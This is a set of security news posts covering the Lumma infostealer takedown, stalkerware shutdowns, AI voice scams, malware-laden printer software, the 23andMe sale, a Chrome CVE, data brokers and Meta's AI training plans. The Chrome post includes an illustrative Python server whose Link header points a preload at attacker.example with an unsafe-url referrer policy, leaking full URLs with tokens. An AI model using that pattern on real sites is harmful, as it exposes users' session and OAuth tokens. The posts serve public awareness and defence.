
Lumma information stealer infrastructure disrupted

The US Department of Justice (DOJ) and Microsoft have disrupted the infrastructure of the Lumma information stealer (infostealer).

Lumma Stealer, also known as LummaC or LummaC2, first emerged in late 2022 and quickly established itself as one of the most prolific infostealers. Infostealer is the name we use for a class of malware that collects sensitive information from infected devices and sends it to an operator. Depending on the type of infostealer and the operator’s goals, that can be anything from usernames and passwords to credit card details and cryptocurrency wallets.

Lumma operates under a malware-as-a-service (MaaS) model, meaning its creators sell access to the malware on underground marketplaces and platforms like Telegram. This model allows hundreds of cybercriminals worldwide to deploy Lumma for their own malicious campaigns.

What makes Lumma particularly dangerous is its wide range of targets and its evolving sophistication. It doesn’t just grab browser-stored passwords or cookies. It’s also capable of extracting autofill data, email credentials, FTP client data, and even two-factor authentication tokens and backup codes, which enables attackers to bypass additional security layers.

As Matthew R. Galeotti, head of the Justice Department’s Criminal Division, put it:

“Malware like LummaC2 is deployed to steal sensitive information such as user login credentials from millions of victims in order to facilitate a host of crimes, including fraudulent bank transfers and cryptocurrency theft.”

Over the last few months alone, Microsoft identified over 394,000 Windows computers infected with Lumma worldwide. The FBI estimates that Lumma has been involved in around 10 million infections globally.

Using a court order from the US District Court for the Northern District of Georgia, Microsoft’s Digital Crimes Unit (DCU) seized, and facilitated the takedown, suspension, and blocking of, approximately 2,300 malicious domains that formed the backbone of the infostealer’s infrastructure.

Most of the seized domains served as user panels through which Lumma customers accessed and deployed the infostealer, so the takedown stops those criminals from using Lumma to compromise computers and steal victim information.

Government agencies and researchers sometimes alter a domain’s DNS records to redirect its traffic to servers they control (called sinkholes). By redirecting the seized domains to Microsoft-controlled sinkholes, investigators can now monitor ongoing attacks and provide intelligence to help defend against similar threats in the future. This takedown slows down cybercriminals, disrupts their revenue streams, and buys time and knowledge for defenders to strengthen security.
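
To picture what sinkholing looks like in practice, here is a minimal sketch in Python: a seized domain simply resolves to an address the defenders control instead of one run by the criminals. The domain name and the sinkhole IP addresses below are hypothetical placeholders (documentation ranges), not real indicators.

```python
# Minimal sketch: check where a domain currently resolves and compare the result
# against addresses believed to be defender-run sinkholes. The domain and the
# documentation-range IPs are hypothetical placeholders, for illustration only.
import socket

SUSPECTED_SINKHOLE_IPS = {"192.0.2.10", "198.51.100.25"}

def resolves_to_sinkhole(domain: str) -> bool:
    try:
        addresses = {info[4][0] for info in socket.getaddrinfo(domain, None)}
    except socket.gaierror:
        return False  # the domain no longer resolves at all
    return bool(addresses & SUSPECTED_SINKHOLE_IPS)

if __name__ == "__main__":
    # Hypothetical seized domain; in reality researchers work from seizure lists.
    print(resolves_to_sinkhole("lumma-panel.example"))
```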

How to protect yourself

Even with the Lumma infrastructure disrupted, the threat of information stealers remains very real and evolving. Here are some practical steps to reduce your risk:

  • Use strong, unique passwords for every account and consider a reputable password manager to keep track of them.
  • Enable multi-factor authentication (MFA) wherever possible. Although Lumma tries to bypass 2FA, having it still adds a crucial layer of defense.
  • Be cautious with emails and downloads. Lumma often spreads through phishing emails and malicious downloads, sometimes disguised as legitimate CAPTCHAs or antivirus software.
  • Keep your software and operating system updated to patch vulnerabilities that malware can exploit.
  • Regularly monitor your financial and online accounts for suspicious activity.
  • Educate yourself about phishing and social engineering tactics to avoid falling victim to trickery.
  • Use an up-to-date real-time anti-malware solution to block install attempts and detect active information stealers.

By understanding how threats like Lumma operate and by taking the necessary steps to protect ourselves, we can reduce the risk of falling prey to these invisible thieves.

You can use Malwarebytes’ free Digital Footprint Portal to see if any of your data has been stolen by the Lumma infostealer. Our database contains many millions of records stolen by Lumma that are being traded on the dark web.



Stalkerware apps go dark after data breach

A stalkerware company that recently leaked millions of users’ personal information online has taken all of its assets offline without any explanation. Now Malwarebytes has learned that the company has taken down other apps too.

Back in February, news emerged of a stalkerware app compromise. Reporters at TechCrunch revealed a vulnerability in three such apps: Spyzie, Cocospy, and Spyic. The flaw exposed data from victims’ devices, making their messages, photos, and location data visible to whoever wanted them. It also gave up approximately 3.2 million email addresses entered by the customers who bought and installed these apps on their targets’ devices.

The bug was so easy to exploit that TechCrunch and the researcher involved wouldn’t divulge it, to protect the compromised details.

Now, the apps have gone dark. TechCrunch revealed that the software has stopped working and the websites advertising it have disappeared. The spyware’s Amazon Web Services storage has also been deleted. The publication speculated that the apps, which were branded separately but looked nearly identical, were possibly shut down to avoid legal repercussions over the data leak.

Stalkerware apps are designed to hide themselves once installed on a person’s phone. They collect data including the location of the device, messages sent by the user, and their contacts.

Spyzie’s website, now no longer available, marketed the software as a tool to keep an eye on your kids. It advertised itself as “100% hidden and invisible so you never get caught”. It also offered to collect their browser history, WhatsApp messages (including deleted ones), Facebook messages, and call logs. Spyzie claimed to have over a million users in more than 190 countries.

These aren’t the only apps that the same organization has taken down. According to archived records of the Spyzie site, it was operated by FamiSoft Limited. That company also produced another child-monitoring app called Teensafe (its website is also now down). Other apps now taken down that the company claimed to have operated include Spyier, Neatspy, Fonemonitor, Spyine, and Minspy.

Stalkerware is typically installed by someone with direct access to the target’s phone or computer, and usually doesn’t require the device to be rooted or jailbroken. Spyzie targeted both Android and iPhone. While frequently marketed as a way to keep children safe, these apps are also frequently used by abusive partners or ex-partners, as explained by the Federal Trade Commission. The Coalition Against Stalkerware, of which Malwarebytes is a founding member, offers advice on what to do if you’re being targeted by a stalker.

There have been several instances over the years of stalkerware apps leaking data. It’s especially pernicious because in many cases it isn’t just the email addresses of the stalkerware’s customers that are compromised; it’s also the personal details of the people whose phones are being spied upon.

Those people may often not be aware that they’re being surveilled, or might have been forced to install the software against their wishes. They are victimized twice: once when an individual invades their privacy, and again when crummy infrastructure exposes their information more widely. If a customer really is using such software as a way of protecting their children, they might want to reconsider their choices.

Are you a victim of domestic abuse, or are you worried that someone else is? If you’re in the US, you can contact the National Domestic Violence Hotline. If you’re in the UK, the government has a useful resource page to help victims, and the charity Refuge operates a hotline.



Scammers are using AI to impersonate senior officials, warns FBI

The FBI has issued a warning about an ongoing malicious text and voice messaging campaign that impersonates senior US officials.

The targets are predominantly current or former US federal or state government officials and their contacts. In the course of this campaign, the cybercriminals have used text messages as well as Artificial Intelligence (AI)-generated voice messages.

After establishing contact, the criminals often send targets a malicious link which the sender claims will take the conversation to a different platform. On this messaging platform, the attacker may push malware or introduce hyperlinks that direct targets to a site under the criminals’ control in order to steal login information, like user names and passwords.

The AI-generated audio used in the vishing campaign is designed to impersonate public figures or a target’s friends or family to increase the believability of the malicious schemes. A vishing attack is a type of phishing attack in which a threat actor uses social engineering tactics via voice communication to scam a target—the word “vishing” is a combination of “voice” and “phishing.”

Due to rapid developments in AI, vishing attacks are becoming more common and more convincing. We have seen reports about callers pretending to be employers, family members, and now government officials. What they have in common is that the callers are after information they can use to steal money or sensitive data from the victim.

How to stay safe

Because these campaigns are very sophisticated and targeted, it’s important to stay vigilant. Some recommendations:

  • Independently verify the identity of the person contacting you, via a different method.
  • Carefully examine the origin of the message. The criminals typically use software to generate phone numbers that are not attributed to a specific mobile phone or subscriber.
  • Listen closely to the tone and word choice of the caller. Do they match those of the person who is supposedly calling you? Also pay attention to any unusual lag in the call.
  • AI-generated content has advanced to the point that it is often difficult to identify. When in doubt about the authenticity of someone wishing to communicate with you, contact your relevant security officials or the FBI for help.

If you believe you have been the victim of the campaign described above, contact your relevant security officials and report the incident to your local FBI Field Office or the Internet Crime Complaint Center (IC3) at www.ic3.gov. Be sure to include as much detailed information as possible.



Malware-infected printer delivered something extra to Windows users

You’d hope that spending $6,000 on a printer would give you a secure experience, free from viruses and other malware. However, in the case of Procolored printers, you’d be wrong.

The Shenzhen-based company sells UV printers, which are able to print on a variety of materials including wood, acrylic, tile, and plastic. They come with all kinds of attractive features. However, as reviewer Cameron Coward found out, they also came with malware (at least, until recently).

Coward received a review model of the Procolored V11 pro DTO UC printer that came with software on a USB thumb drive. “One of those was the Microsoft Visual C++ Redistributable in a zip folder,” he said in a review of the product. “But as soon as I unzipped it, Windows Defender quarantined the files and informed me that it found a Floxif virus.”

Floxif is a family of malware that infects a computer and installs a backdoor, giving the attacker control of the machine and allowing them to download other malware onto the system.

Coward also tried to download the control software for the printer from Procolored’s website, which linked to the mega.nz file sharing site. When he tried to download it, Google Chrome detected a virus and blocked it.

He checked in with the vendor, which denied that there was any malware and said the antivirus software was reporting a false positive (when security software mistakenly identifies legitimate software as malicious).

Getting a second opinion

Coward asked for help on Reddit, and Karsten Hahn, principal malware researcher for cybersecurity company G Data CyberDefense, investigated the issue. After scanning 8 GB of software files for the Procolored products, all maintained on mega.nz, Hahn found no evidence of Floxif, he reported in an account of the investigation.

He did find two malware strains in the files, though. Win32.Backdoor.XRedRAT.A is a backdoor that first cropped up in other analyses last year. It gives the attacker complete control over the victim’s PC, including letting them enter command-line instructions, log keystrokes, and download or delete files.

The second, MSIL.Trojan-Stealer.CoinStealer.H, steals cryptocurrency from victims’ machines. It replaces cryptocurrency addresses in the clipboard with an address belonging to the attacker, whose wallet has already received around $100,000 in presumably ill-gotten funds.
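
To make that clipboard trick more concrete, here is a rough defensive sketch (not Malwarebytes code): it polls the clipboard and warns when one address-like string is silently replaced by a different one, which is the hallmark of this kind of stealer. It assumes the third-party pyperclip package and uses a deliberately loose pattern for Bitcoin-style addresses.

```python
# Rough illustration of spotting clipboard address-swapping, the technique described
# above. Requires the third-party "pyperclip" package (pip install pyperclip); the
# regex is a loose, illustrative match for Bitcoin-style addresses, not a detector
# you should rely on.
import re
import time

import pyperclip

ADDRESS_RE = re.compile(r"^(bc1[0-9a-z]{20,60}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})$")

def watch_clipboard(poll_seconds: float = 0.5) -> None:
    last = pyperclip.paste()
    while True:
        current = pyperclip.paste()
        # A copied address silently morphing into a *different* address is suspicious.
        if current != last and ADDRESS_RE.match(last or "") and ADDRESS_RE.match(current or ""):
            print(f"Warning: clipboard address changed from {last} to {current}")
        last = current
        time.sleep(poll_seconds)

if __name__ == "__main__":
    watch_clipboard()
```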

Both malware files were detected by Malwarebytes’ Machine Learning component DDS as Generic.Malware.AI.DDS, so Malwarebytes/ThreatDown customers were protected against these threats.

After confronting Procolored with the evidence, the company responded to Hahn:

“The software hosted on our website was initially transferred via USB drives. It is possible that a virus was introduced during this process.”

The organization said that it had taken steps to solve the problem, including temporarily taking down all software from its website and scanning all of its files.

“Only after passing stringent virus and security checks will the software be re-uploaded. This is a top priority for us, and we are taking it very seriously.”

However, Procolored hadn’t taken things seriously before that point. Searching the internet, Coward found that many owners of Procolored machines had reported the same issue. The infected files had been up for months.

A history of bundled malware

You might not think that this story applies to you. After all, only a small subset of our readers would be interested in buying such a specialist printer. However, this isn’t the only time a manufacturer has shipped a product riddled with malware.

In 2017, IBM accidentally shipped malware on USB keys containing initialization software for its storage devices. In 2018, Schneider Electric had to warn customers that some of the USB drives shipped with its battery monitoring software were infected with malware.

In 2019, we discovered that a US government program providing Android phones to low-income users was shipping them with malware.

Some of these malicious products were shipped on purpose by people who should have known better. In 2005, Sony shipped hidden software on its audio CDs that installed itself on Windows computers to stop them making digital copies. Removing it rendered the Windows installation useless.

The takeaway is this: just because a company has a respected brand doesn’t mean they can’t make mistakes. Take just as much care when installing something from a ‘reliable’ source as you would when doing anything else. Security software and caution go a long way.



23andMe and its customers’ genetic data bought by a pharmaceutical org

The bankrupt genetic testing company 23andMe has been scooped up by drug producer Regeneron Pharmaceuticals for $256 million.

But why would a pharmaceutical company like Regeneron buy a bankrupt genetics testing company like 23andMe for such a large amount of money?

Well, Regeneron is a leading biotechnology company that invents, develops, and monetizes life-transforming medicines for people with serious diseases. So, it seems obvious that Regeneron’s primary interest lies in the genetic data collected by 23andMe, and the situation raises complex ethical, privacy, and security concerns that customers should understand and address.

Regeneron has pledged to uphold data privacy and security, working closely with a court-appointed Customer Privacy Ombudsman, acknowledging the importance of customer data protection and the ethical use of genetic information.

Dr. George Yancopoulos, Regeneron’s president, said in a statement:

“We believe we can help 23andMe deliver and build upon its mission to help people learn about their own DNA and how to improve their personal health, while furthering Regeneron’s efforts to improve the health and wellness of many.”

However, the scenario is less grim than feared by Senator Cassidy, chair of the US Senate Health, Education, Labor, and Pensions Committee, who expressed concerns about foreign adversaries, including the Chinese Communist Party, acquiring the sensitive genetic data of millions of Americans through 23andMe.

Regeneron already manages genetic data from nearly three million people, so 23andMe’s 15 million customers significantly expand this resource. Besides the genetic data itself, Regeneron likely values the consumer genetics business infrastructure and research services that 23andMe built, which can complement Regeneron’s pharmaceutical pipeline and personalized medicine efforts.

Genetic data is uniquely sensitive because it contains deeply personal information about an individual’s health risks, ancestry, and even family relationships. Unlike traditional medical records protected under HIPAA, 23andMe’s genetic data is covered primarily by consumer privacy laws, which offer weaker protections.

What can consumers do to protect their data?

Customers should actively manage their data on 23andMe by reviewing policies, deleting data if desired, and staying vigilant about how their sensitive genetic information is used.

People who have submitted samples to 23andMe have three options, each providing a different level of privacy.

1. Delete your genetic data from 23andMe

For 23andMe customers who want to delete their data from 23andMe:

  • Log into your account and navigate to Settings.
  • Under Settings, scroll to the section titled 23andMe data. Select View.
  • You will be asked to enter your date of birth for extra security. 
  • In the next section, you’ll be asked which personal data, if any, you’d like to download from the company (make sure you’re using a personal, not a public, computer). Once you’re finished, scroll to the bottom and select Permanently delete data.
  • You should then receive an email from 23andMe detailing its account deletion policy and requesting that you confirm your request. Once you confirm you’d like your data to be deleted, the deletion will begin automatically, and you’ll immediately lose access to your account. 

2. Destroy your 23andMe test sample

If you previously opted to have your saliva sample and DNA stored by 23andMe, but want to change that preference, you can do so from your account settings page, under “Preferences.”

3. Revoke permission for your genetic data to be used for research

If you previously consented to 23andMe and third-party researchers using your genetic data and sample for research, you may withdraw consent from the account settings page, under Research and Product Consents.

Check if you were caught up in the 23andMe data breach

Additionally, you may want to check if your data was exposed in the 2023 data breach. We recommend that you run a scan using our free Digital Footprint Portal to see if your data was exposed in the breach, and then to take additional steps to protect yourself (we’ll walk you through those).



How Los Angeles banned smartphones in schools (Lock and Code S06E10)

This week on the Lock and Code podcast…

There’s a problem in class today, and the second largest school district in the United States is trying to solve it.

After looking at the growing body of research that has associated increased smartphone and social media usage with increased levels of anxiety, depression, suicidal thoughts, and isolation—especially amongst adolescents and teenagers—Los Angeles Unified School District (LAUSD) implemented a cellphone ban across its 1,000 schools for its more than 500,000 students.

Under the ban, students who are kindergartners all the way through high school seniors cannot use cellphones, smartphones, smart watches, earbuds, smart glasses, and any other electronic devices that can send messages, receive calls, or browse the internet. Phones are not allowed at lunch or during passing periods between classes, and, under the ban, individual schools decide how students’ phones are stored, be that in lockers, in magnetically sealed pouches, or just placed into sleeves at the front door of every classroom, away from students’ reach.

The ban was approved by the Los Angeles Unified School District through what is called a “resolution”—which the board voted on last year. LAUSD Board Member Nick Melvoin, who sponsored the resolution, said the overall ban was the right decision to help students.  

“The research is clear: widespread use of smartphones and social media by kids and adolescents is harmful to their mental health, distracts from learning, and stifles meaningful in-person interaction.”

Today, on the Lock and Code podcast with host David Ruiz, we speak with LAUSD Board Member Nick Melvoin about the smartphone ban, how exceptions were determined, where opposition arose, and whether it is “working.” Melvoin also speaks about the biggest changes he has seen in the first few months of the cellphone ban, especially the simple reintroduction of noise in hallways.

“[During a school visit last year,] every single kid was on their phone, every single kid. They were standing there looking, texting again, sometimes texting someone who was within a few feet of them, and it was quiet.”

Tune in today to listen to the full episode.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)



Update your Chrome to fix serious actively exploited vulnerability

Google released an emergency update for the Chrome browser to patch an actively exploited vulnerability that could have serious ramifications.

The update brings the Stable channel to versions 136.0.7103.113/.114 for Windows and Mac and 136.0.7103.113 for Linux.

The easiest way to update Chrome is to allow it to update automatically, but you can end up lagging behind if you never close your browser or if something goes wrong—such as an extension stopping you from updating the browser.

To manually get the update, click Settings > About Chrome. If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is restart the browser in order for the update to complete, and for you to be safe from those vulnerabilities.

Chrome is up to date: Version 136.0.7103.114

This update is crucial because it addresses an actively exploited vulnerability that could allow an attacker to steal information you share with other websites. Google says it is aware of reports that an exploit for CVE-2025-4664 exists in the wild. While Google stopped short of confirming active exploitation, the Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability to its Known Exploited Vulnerabilities catalog—a strong indication that it is being used in real attacks.

Technical details

The vulnerability, tracked as CVE-2025-4664, lies in the Chrome Loader component, which handles resource requests. When you visit a website, your browser often needs to load additional pieces of that site, such as images, scripts, or stylesheets, which may come from various sources. The Loader manages these requests to fetch and display those resources properly.

While it does that, it should enforce security policies that prevent one website from accessing data belonging to another website, a principle known as the “same-origin policy.”

The problem was that those security policies were not applied properly to Link headers. This allowed an attacker to set a referrer-policy in a Link header that told Chrome to include full URLs, including sensitive query parameters, when requesting cross-site resources.

This is undesirable since query parameters in full URLs often contain sensitive information such as OAuth tokens (used for authentication), session identifiers, and other private data.

Imagine you visit a website related to sensitive or financial information, and the URL includes a secret code in the address bar that proves it’s really you. Normally, when your browser loads images or other content from different websites, it keeps that secret code private. But because of this Chrome Loader flaw, a successful attacker can trick your browser into sending that secret code to a malicious website just by embedding an image or other resource there.

The attacker could, for example, embed a hidden image hosted on their own server and harvest the full URLs. This means they can steal your private information without you realizing it, potentially letting them take over your accounts on other online services.
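
As a deliberately simplified sketch of the pattern described above, the snippet below shows a server response carrying a Link preload header with referrerpolicy=unsafe-url, which asks the browser to send the full referring URL, query string and all, when fetching the preloaded resource. The domain attacker.example and every value here are hypothetical and purely illustrative; this is not a working exploit for CVE-2025-4664.

```python
# Simplified illustration of the response pattern described above, using only the
# Python standard library. "attacker.example" and all values are hypothetical; this
# shows the mechanism, not a working exploit.
from http.server import BaseHTTPRequestHandler, HTTPServer

class LinkHeaderHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        # The Link header asks the browser to preload a cross-origin image and carries
        # its own referrer policy. "unsafe-url" requests that the full referring URL,
        # query string included, be sent with that fetch; patched Chrome builds no
        # longer honor this the way the vulnerable Loader component did.
        self.send_header(
            "Link",
            '<https://attacker.example/pixel.png>; rel="preload"; as="image"; '
            'referrerpolicy="unsafe-url"',
        )
        self.end_headers()
        self.wfile.write(b"<html><body>Nothing to see here.</body></html>")

if __name__ == "__main__":
    HTTPServer(("127.0.0.1", 8080), LinkHeaderHandler).serve_forever()
```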



A week in security (May 12 – May 18)

Last week on Malwarebytes Labs:

Last week on ThreatDown:

Stay safe!



Data broker protection rule quietly withdrawn by CFPB

The Consumer Financial Protection Bureau (CFPB) has decided to withdraw a 2024 rule to limit the sale of Americans’ personal information by data brokers.

In a Federal Register notice published yesterday, the CFPB said it “has determined that legislative rulemaking is not necessary or appropriate at this time to address the subject matter”.

The data brokerage industry generates an estimated $300 billion in annual revenue. Data brokers actively collect and sell your Personally Identifiable Information (PII), including financial details, personal behavior, and interests, for profit. They often do this without seeking your consent or without making it clear that you have given consent.

The CFPB proposed the rule in December 2024 to curb data brokers from selling Americans’ sensitive personal and financial information. By restricting the sale of personal identifiers such as Social Security Numbers (SSNs) and phone numbers, the rule aimed to ensure that companies share financial data, like income, only for legitimate purposes, such as facilitating a mortgage approval, rather than selling it on to scammers who target people in financial distress.

The proposal sought to make data brokers comply with federal law and address serious threats posed by current industry practices. It targeted not only national security, surveillance, and criminal exploitation risks, but also aimed to limit doxxing and protect the personal safety of law enforcement personnel and domestic violence survivors.

The CFPB intended to treat data brokers like credit bureaus and background check companies, requiring them to comply with the Fair Credit Reporting Act (FCRA) regardless of how they use financial information. The proposal would also have required data brokers to obtain much more explicit and separately authorized consumer consent.

Set up this way, the rule wouldn’t have interfered with the existing pathways created for and by the FCRA, while offering consumers more protection.

However, acting CFPB Director Russell Vought said the agency had decided to shelve the rule for now, pointing to “updates to Bureau policies.”

Watchdog groups take a different view, though. Matt Schwartz, a policy analyst at Consumer Reports, said the withdrawal would leave consumers vulnerable:

“Data brokers collect a treasure trove of sensitive information about virtually every American and sell that information widely, including to scammers looking to rip off consumers.”

If data brokers were required to comply with the FCRA:

  • They would have to ensure the accuracy and privacy of the data they collect and share.
  • They would have to provide consumers with mechanisms to dispute and correct inaccurate information.
  • They would have to notify consumers when their data is used for decisions about credit, insurance, or employment.
  • They could face enforcement actions and penalties for non-compliance, as the Federal Trade Commission (FTC) and CFPB have imposed in the past.


Meta sent cease and desist letter over AI training

EU privacy advocacy group NOYB has clapped back at Meta over its plans to start training its AI model on European users’ data. In a cease and desist letter to the social networking giant’s Irish operation signed by founder Max Schrems, the non-profit demanded that it justify its actions or risk legal action.

In April, Meta told users that it was going to start training its generative AI models on their data.

Schrems makes several arguments against Meta in the NOYB letter:

1. Meta’s ‘legitimate interests’ are illegitimate

NOYB continues to question Meta’s use of an opt-out mechanism rather than excluding all EU users from the process and requiring them to opt in. “Meta may face massive legal risks – just because it relies on an ‘opt-out’ instead of an ‘opt-in’ system for AI training,” NOYB said on its site.

Companies that want to process personal data without explicit consent must demonstrate a legitimate interest to do so under the GDPR. Meta hasn’t published information about how it justifies that interest, says Schrems. He has trouble seeing how training a general-purpose AI model could be deemed a legitimate interest, because it violates a key GDPR principle: limiting data processing to specific purposes.

NOYB doesn’t believe that Meta can enforce GDPR rights for personal data like the right to be forgotten once an AI system is trained on it, especially if that system is an open-source one like Meta’s Llama AI model.

“How should it have a ‘legitimate interest’ to suck up all data for AI training?” Schrems said. “While the ‘legitimate interest’ assessment is always a multi-factor test, all factors seem to point in the wrong direction for Meta. Meta simply says that its interest in making money is more important than the rights of its users.”

2. What you don’t know can hurt you

Schrems warns that people who don’t have a Facebook account but just happen to be mentioned or caught in a picture on a user’s account will be at risk under Meta’s AI training plans. They might not even be aware that their information has been used to train AI, and therefore couldn’t object, he argues.

3. Differentiation is difficult

NOYB also worries that the social media giant couldn’t realistically separate people whose data is linked on the system. For example, what happens if two users are in the same picture, but one has opted out of AI training and one hasn’t? Or they’re in different geographies and one is protected under GDPR and one isn’t?

Separating data gets even stickier with ‘special category’ data, which the GDPR treats as especially sensitive. This includes things like religious beliefs or sexual orientation.

“Based on previous legal submissions by Meta, we therefore have serious doubts that Meta can indeed technically implement a clean and proper differentiation between users that performed an opt-out and users that did not,” Schrems says.

Other arguments

People who have been entering their data into Facebook for the last two decades could not have been expected to know that Facebook would use it to train AI now, the letter said. That data is private because Facebook tries hard to protect it from web scrapers and limits who can see it.

In any case, other EU laws would make the proposed AI training illegal, NOYB warns. It points to the Digital Markets Act, which stops companies from cross-referencing personal data between services without consent.

Meta, which says that it won’t train its AI on private user messages, had originally delayed the process altogether after pushback from the Irish Data Protection Commission (DPC). Last month the company said that it had “engaged constructively” with the regulator. There has been no further news from the Irish DPC on the issue aside from a statement thanking the European Data Protection Board for an opinion on the matter handed down in December. That opinion left the specifics of AI training policy up to national regulators.

“We also understand that the actions planned by Meta were neither approved by the Irish DPC nor other Concerned Supervisory Authorities (CSAs) in the EU/EEA. We therefore have to assume that Meta is openly disregarding previous guidance by the relevant Supervisory Authorities (SAs),” Schrems’ letter said.

NOYB has asked Meta to justify itself or sign a cease and desist order by May 21. Otherwise, it threatens legal action by May 27, which is the date that Meta is due to start its training. If it brings an action under the EU’s new Collective Redress Scheme, it could obtain an injunction from different jurisdictions outside Ireland to shut down the training process and delete the data. A class action suit might also be possible, Schrems added.

In a statement to Reuters, Meta called NOYB “wrong on the facts and the law”, saying that it gives users adequate opt-out options.

